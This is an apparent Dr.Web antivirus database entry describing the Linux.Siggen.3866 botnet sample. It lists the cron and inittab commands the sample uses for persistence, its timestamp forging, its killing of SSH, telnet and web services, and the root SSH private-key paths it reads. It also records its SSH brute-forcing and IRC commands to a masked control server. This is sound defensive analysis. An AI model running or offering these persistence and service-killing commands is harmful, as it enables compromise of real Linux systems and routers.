Um eine korrekte Funktionsweise unserer Website zu gewährleisten, müssen Sie die Unterstützung für JavaScript in Ihrem Browser aktivieren.
Linux.Siggen.3866
Added to the Dr.Web virus database:
2021-05-01
Virus description added:
2021-05-01
Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
/var/spool/cron/crontabs/root
/etc/inittab
/etc/rc.local
Malicious functions:
Gets access to SSH keys
/root/.ssh/config
/root/.ssh/known_hosts
/root/.ssh/id_ed25519.pub
/root/.ssh/id_ed25519
/root/.ssh/id_ecdsa.pub
/root/.ssh/id_ecdsa
/root/.ssh/id_rsa.pub
/root/.ssh/id_rsa
/root/.ssh/id_dsa.pub
/root/.ssh/id_dsa
Modifies router settings:
Stops system services:
service httpd stop
service telnetd stop
service sshd stop
systemctl stop httpd.service
systemctl stop telnetd.service
systemctl stop sshd.service
Launches processes:
sh -c touch -acmr /bin/ls <SAMPLE_FULL_PATH>
touch -acmr /bin/ls <SAMPLE_FULL_PATH>
sh -c (crontab -l | grep -v \"<SAMPLE_FULL_PATH>\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1
grep -v <SAMPLE_FULL_PATH>
crontab -l
grep -v no cron
grep -v lesshts/run.sh
sh -c echo \"* * * * * <SAMPLE_FULL_PATH> > /dev/null 2>&1 &\" >> /var/run/.x00740882966
sh -c crontab /var/run/.x00740882966
crontab /var/run/.x00740882966
sh -c rm -rf /var/run/.x00740882966
rm -rf /var/run/.x00740882966
sh -c cat /etc/inittab | grep -v \"<SAMPLE_FULL_PATH>\" > /etc/inittab2
cat /etc/inittab
sh -c echo \"0:2345:respawn:<SAMPLE_FULL_PATH>\" >> /etc/inittab2
sh -c cat /etc/inittab2 > /etc/inittab
cat /etc/inittab2
sh -c rm -rf /etc/inittab2
rm -rf /etc/inittab2
sh -c touch -acmr /bin/ls /etc/inittab
touch -acmr /bin/ls /etc/inittab
sh -c /bin/uname -n
sh -c nvram get router_name
/bin/uname -n
sh -c kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &
cat /var/run/httpd.pid
sh -c service httpd stop > /dev/null 2>&1 &
sh -c killall -9 mini_httpd > /dev/null 2>&1 &
sh -c killall -9 minihttpd > /dev/null 2>&1 &
sh -c kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &
sh -c nvram set httpd_enable=0 > /dev/null 2>&1
cat /var/run/thttpd.pid
sh -c nvram set http_enable=0 > /dev/null 2>&1
sh -c killall -9 httpd > /dev/null 2>&1 &
sh -c service telnetd stop > /dev/null 2>&1 &
sh -c service sshd stop > /dev/null 2>&1 &
sh -c killall -9 telnetd > /dev/null 2>&1 &
sh -c killall -9 utelnetd > /dev/null 2>&1 &
sh -c killall -9 dropbear > /dev/null 2>&1 &
sh -c killall -9 sshd > /dev/null 2>&1 &
sh -c killall -9 lighttpd > /dev/null 2>&1 &
sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear ; /etc/init.d/dropbear stop ; rm -rf /var/run/tt* /tmp/tt* )>/dev/null 2>&1 &
cat /var/run/dropbear.pid
cat /var/run/sshd.pid
/etc/init.d/dropbear stop
rm -rf /var/run/tt* /tmp/tt*
Attempts to kill system processes:
killall -9 mini_httpd
killall -9 minihttpd
killall -9 httpd
killall -9 telnetd
killall -9 utelnetd
killall -9 dropbear
killall -9 sshd
Kills system processes:
Attempts to kill the following processes:
killall -9 lighttpd
killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear
Performs operations with the file system:
Modifies file access rights:
/var/spool/cron/crontabs/tmp.smeFck
Creates or modifies files:
/var/run/.x00740882966
/run/.x00740882966
/var/spool/cron/crontabs/tmp.smeFck
/etc/inittab2
Deletes files:
/var/run/.x00740882966
/etc/inittab2
/var/run/tt*
/tmp/tt*
Network activity:
Awaits incoming connections on ports:
Attacks using a special dictionary (brute-force technique) via the SSH protocol
Connects to the following servers over the IRC protocol:
Server: 19#.#8.172.42; Command: NICK A5|o|0|127234|unknown\nUSER x00 localhost localhost :1.0+tftp_s\n
Server: 19#.#8.172.42; Command: MODE A5|o|0|127234|unknown -xi\n
Server: 19#.#8.172.42; Command: MODE A5|o|0|127234|unknown +B\n
Server: 19#.#8.172.42; Command: JOIN #0x00 :777\n
Server: 19#.#8.172.42; Command: NOTICE bot :\n
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Laden Sie Dr.Web für Android herunter
Kostenlos für 3 Monate
Alle Schutzkomponenten
Verlängerung der Testversion über AppGallery/Google Pay
Wenn Sie diese Webseite weiter benutzen, bedeutet dies, dass Sie mit der Verarbeitung von Cookies sowie dem Einsatz anderer Technologien zur Sammlung von statistischen Nutzerdaten einverstanden sind. Mehr dazu
OK